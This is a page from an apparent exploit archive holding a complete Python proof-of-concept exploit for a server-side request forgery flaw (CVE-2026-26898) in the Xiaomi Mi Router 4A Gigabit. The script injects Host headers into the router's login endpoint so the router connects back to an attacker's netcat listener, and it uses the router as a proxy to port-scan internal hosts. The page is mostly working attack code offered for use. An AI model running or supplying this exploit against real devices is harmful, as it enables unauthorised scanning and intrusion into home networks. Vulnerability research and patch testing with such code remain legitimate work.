5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / xiaomi_ssrf_exploit.py PY
#!/usr/bin/env python3
"""
Xiaomi Mi Router 4A Gigabit - SSRF Exploit (CVE-2026-26898)
============================================================
Vulnerability: Host Header Injection leading to Server-Side Request Forgery
Affected: Xiaomi Mi Router 4A Gigabit Edition, Firmware 3.0.24 (and likely others)
Author: Ahmet Mersin
Date: 2026-01-15

Description:
    The Xiaomi Router's web interface (LuCI/Nginx) fails to validate the HTTP Host 
    header. When a request is made to /cgi-bin/luci/api/xqsystem/login, the router 
    uses the Host header value to make outbound requests, allowing an attacker to:
    
    1. Force the router to connect to arbitrary IP:Port combinations
    2. Scan internal networks using the router as a proxy
    3. Potentially exfiltrate data or attack internal services
    4. Chain with other vulnerabilities for Remote Code Execution

Usage:
    # Start listener first:
    nc -lvnp 4444
    
    # Run exploit:
    python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --callback YOUR_IP --port 4444

    # Scan internal ports:
    python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --scan 192.168.31.1 --ports 22,23,80,443,8080
"""

import requests
import socket
import threading
import argparse
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed

class XiaomiSSRFExploit:
    def __init__(self, target_ip, timeout=3):
        self.target_ip = target_ip
        self.timeout = timeout
        self.vuln_endpoint = "/cgi-bin/luci/api/xqsystem/login"
        
    def send_ssrf(self, callback_ip, callback_port):
        """Send SSRF payload via Host header injection"""
        url = f"http://{self.target_ip}{self.vuln_endpoint}"
        headers = {
            "Host": f"{callback_ip}:{callback_port}",
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
            "Accept": "*/*",
            "Connection": "close"
        }
        
        try:
            response = requests.get(url, headers=headers, timeout=self.timeout, allow_redirects=False)
            return True, response.status_code
        except requests.exceptions.Timeout:
            return True, "TIMEOUT"  # Timeout often means connection was made
        except requests.exceptions.ConnectionError as e:
            return False, str(e)
        except Exception as e:
            return False, str(e)

    def callback_exploit(self, callback_ip, callback_port):
        """Basic SSRF callback demonstration"""
        print(f"\n[*] Target Router: {self.target_ip}")
        print(f"[*] Callback Server: {callback_ip}:{callback_port}")
        print(f"[*] Vulnerable Endpoint: {self.vuln_endpoint}")
        print("-" * 50)
        
        print(f"[!] Make sure you have a listener running:")
        print(f"    nc -lvnp {callback_port}")
        print("-" * 50)
        
        print("[*] Sending SSRF payload...")
        success, result = self.send_ssrf(callback_ip, callback_port)
        
        if success:
            print(f"[+] Request sent successfully (Status/Result: {result})")
            print(f"[+] Check your listener for incoming connection from {self.target_ip}")
        else:
            print(f"[-] Request failed: {result}")
            
        return success

    def port_scan(self, scan_target, ports):
        """Use SSRF to scan ports on internal hosts"""
        print(f"\n[*] SSRF Port Scanner")
        print(f"[*] Router (Proxy): {self.target_ip}")
        print(f"[*] Scan Target: {scan_target}")
        print(f"[*] Ports: {ports}")
        print("-" * 50)
        
        open_ports = []
        closed_ports = []
        
        for port in ports:
            sys.stdout.write(f"\r[*] Scanning port {port}...")
            sys.stdout.flush()
            
            start_time = time.time()
            success, result = self.send_ssrf(scan_target, port)
            elapsed = time.time() - start_time
            
            # Timing-based detection: 
            # - Fast response = port closed (immediate reject)
            # - Slow/timeout = port open (connection established)
            if elapsed > 1.5 or result == "TIMEOUT":
                open_ports.append(port)
                print(f"\r[+] Port {port}: OPEN (response time: {elapsed:.2f}s)")
            else:
                closed_ports.append(port)
        
        print("\n" + "=" * 50)
        print("[*] Scan Results:")
        print(f"    Open ports: {open_ports if open_ports else 'None detected'}")
        print(f"    Closed/Filtered: {len(closed_ports)} ports")
        
        return open_ports

    def check_vulnerability(self):
        """Verify if target is vulnerable"""
        print(f"\n[*] Checking vulnerability on {self.target_ip}...")
        
        # Create a simple socket listener
        test_port = 44444
        listener_ready = threading.Event()
        connection_received = threading.Event()
        
        def listener():
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                sock.bind(('0.0.0.0', test_port))
                sock.listen(1)
                sock.settimeout(5)
                listener_ready.set()
                
                conn, addr = sock.accept()
                if addr[0] == self.target_ip:
                    connection_received.set()
                conn.close()
                sock.close()
            except:
                pass
        
        # Get local IP
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            s.connect((self.target_ip, 80))
            local_ip = s.getsockname()[0]
        finally:
            s.close()
        
        print(f"[*] Local IP: {local_ip}")
        print(f"[*] Test Port: {test_port}")
        
        # Start listener thread
        t = threading.Thread(target=listener)
        t.daemon = True
        t.start()
        
        listener_ready.wait(timeout=2)
        
        # Send SSRF
        self.send_ssrf(local_ip, test_port)
        
        # Wait for connection
        time.sleep(3)
        
        if connection_received.is_set():
            print(f"[+] VULNERABLE! Router connected back to {local_ip}:{test_port}")
            return True
        else:
            print("[-] Could not confirm vulnerability (no callback received)")
            print("    This may be due to firewall or network configuration")
            return False


def main():
    banner = """
    ╔═══════════════════════════════════════════════════════════════╗
    ║     Xiaomi Mi Router 4A Gigabit - SSRF Exploit                ║
    ║     CVE-2026-26898 (Host Header Injection)                    ║
    ╚═══════════════════════════════════════════════════════════════╝
    """
    print(banner)
    
    parser = argparse.ArgumentParser(
        description="Xiaomi Router 4A SSRF Exploit via Host Header Injection",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  Verify vulnerability:
    python3 %(prog)s --target 192.168.31.1 --check

  Callback exploit (start nc -lvnp 4444 first):
    python3 %(prog)s --target 192.168.31.1 --callback 192.168.31.100 --port 4444

  Internal port scan:
    python3 %(prog)s --target 192.168.31.1 --scan 192.168.31.1 --ports 22,23,80,443,8080
        """
    )
    
    parser.add_argument("--target", "-t", required=True,
                       help="IP address of vulnerable Xiaomi Router")
    parser.add_argument("--check", "-c", action="store_true",
                       help="Check if target is vulnerable")
    parser.add_argument("--callback", "-b",
                       help="Your IP for callback (SSRF demonstration)")
    parser.add_argument("--port", "-p", default="4444",
                       help="Callback port (default: 4444)")
    parser.add_argument("--scan", "-s",
                       help="Target IP to scan using SSRF")
    parser.add_argument("--ports", default="21,22,23,25,80,443,8080,8443",
                       help="Ports to scan (comma-separated)")
    parser.add_argument("--timeout", default=3, type=int,
                       help="Request timeout in seconds")
    
    args = parser.parse_args()
    
    exploit = XiaomiSSRFExploit(args.target, args.timeout)
    
    if args.check:
        exploit.check_vulnerability()
    elif args.callback:
        exploit.callback_exploit(args.callback, args.port)
    elif args.scan:
        ports = [int(p.strip()) for p in args.ports.split(",")]
        exploit.port_scan(args.scan, ports)
    else:
        parser.print_help()


if __name__ == "__main__":
    main()